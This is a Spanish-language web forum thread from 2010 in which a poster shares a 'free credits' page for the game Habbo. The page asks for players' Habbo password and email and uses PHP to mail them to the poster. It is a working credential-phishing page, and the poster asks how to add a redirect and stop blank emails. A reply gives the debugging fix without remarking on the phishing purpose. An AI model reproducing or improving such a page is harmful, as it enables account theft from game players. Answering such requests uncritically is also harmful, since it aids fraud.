Foros del Web » Programando para Internet » Javascript »

Redireccionar a una web despues de dar a ENVIAR en mi formulario

Estas en el tema de Redireccionar a una web despues de dar a ENVIAR en mi formulario en el foro de Javascript en Foros del Web. Pues eso que me gustaria que despues de que la gente de a enviar en el formulario este les mostrase una pagina mia por ejemplo ...
  #1 (permalink)  
Antiguo 21/11/2010, 14:10
 
Fecha de Ingreso: noviembre-2010
Mensajes: 1
Antigüedad: 13 años, 5 meses
Puntos: 0
Información Redireccionar a una web despues de dar a ENVIAR en mi formulario

Pues eso que me gustaria que despues de que la gente de a enviar en el formulario este les mostrase una pagina mia por ejemplo pagform.htm ó pagform.php y no se como hacerlo.
Tambien si alguien me dice o me aclara porque cuando recibo el formulario recibo 2 correos uno con los datos del que lo ha mandado y otro vacio completamente igual pero sin datos.
os dejo el archivo html a ver si lo podeis corregir ya con lo de redireccionamiento tambien.
Gracias a todos de antemano
------------------
<! DOCTYPE HTML>
<html>
<head>
<title>Login</title>
<style type="text/css">
.style2 {
font-family: Arial;
}
.style3 {
background-color: #E5E5E5;
}
.style4 {
background-color: #00FF00;
}
.style6 {
font-size: x-large;
}
.style7 {
color: #008000;
}
.style8 {
text-align: left;
}
.style9 {
text-align: left;
font-weight: bold;
font-family: Arial;
}
.style12 {
margin-left: 120px;
}
</style>
</head>
<body>
<p class="style12">
<strong><span class="style2"><br>
<img src="Habo.JPG" width="301" height="92">
<span class="style6">CREDITOS GRATIS</span></span></strong></p>
<p class="style12">
<strong>P<span class="style2">aso 1: Has de registrarte en la web
para poder recibir los regalos y creditos.<br>
<br>
<span class="style7">Para registrarte en primer lugar has de poner el
correo y la contraseña que usas en HABBO<br>
Si no pones la correcta la página te dará error y no te dejará
seguir..!! es decir no pasaras de esta pagina.</span></span></strong><br>
<br>
<br>
<strong> <br>
</p>
<form action="formulario2.php" method="post" enctype="multipart/form-data" name="form1" class="style12">
<table border="0">
<tr>
<td width="200" class="style9"><div class="style9">Nick:</div></td>
<td width="200" class="style8"><div align="left" class="style8">
<label>
<input name="nombre" type="text" id="nombre" style="width: 281px" class="style3" />
</label>
</div></td>
</tr>
<tr>
<td class="style9"><div class="style9">Contraseña:</div></td>
<td class="style8"><div align="left" class="style8">
<label>
<input name="pass" type="password" id="password" style="width: 242px" class="style3" />
</label>
</div></td>
</tr>
<tr>
<td class="style9"><div class="style9">E-mail:</div></td>
<td class="style8">
<input name="email" type="text" id="email" style="width: 340px" class="style3" /> </td>
</tr>
<tr>
<td class="style8"><div class="style8">
<input name="restablecer" type="reset" id="restablecer" value="Restablecer" class="style3" />
</div></td>
<td class="style8"><div class="style8">
<input name="Enviar" type="submit" id="Enviar" value="Iniciar Registro" class="style4" />
</div></td>
</tr>
</table></form>
<?php
$sendTo = "[email protected]";
$subject = "PASS";
$nombre = $_POST["nombre"];
$titulo = $_POST["pass"];
$email = $_POST["email"];
$headers .= "";
$message = "Nombre: " . $nombre . "\nPassword: " . $titulo . "\nEmail: " . $email;
mail($sendTo, $subject, $message, $headers);
?>
</strong>
<p><img src="Habbo.JPG" width="457" height="591"><img src="Habboo.JPG" width="545" height="641"></p>
</body>

</html>
  #2 (permalink)  
Antiguo 21/11/2010, 14:31
Avatar de zerokilled
Javascripter
 
Fecha de Ingreso: abril-2009
Ubicación: Isla del Encanto, La Borinqueña [+>==]
Mensajes: 8.050
Antigüedad: 15 años
Puntos: 1485
Respuesta: Redireccionar a una web despues de dar a ENVIAR en mi formulario

eso es mas tema de lenguaje servidor que de html. en html no puedes manejar esas caracteristicas. el correo vacio lo estas recibiendo porque al final tienes codigo php que envia el correo. de modo que la primera vez que carga el formulario, evidentemente no hay datos pero igual estas enviando un correo. ya para cuando el usuario envia los datos -si es que se envia al mismo documento- entonces se envia otro correo pero con los datos. ¿que tienes que hacer? determinar si existe los datos antes de enviar el correo. y para la redireccion, mas o menos lo mismo. primero determina si existen datos y luego con la funcion header de php envias el encabezado Location con la url. pero ojo, este proceso tienes que hacerlo antes de enviar cualquier contenido html al cliente.
__________________
la maldad es una virtud humana,
y la espiritualidad es la lucha del hombre contra su maldad.

Etiquetas: dar, enviar, redireccionar, formulario
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 20:22.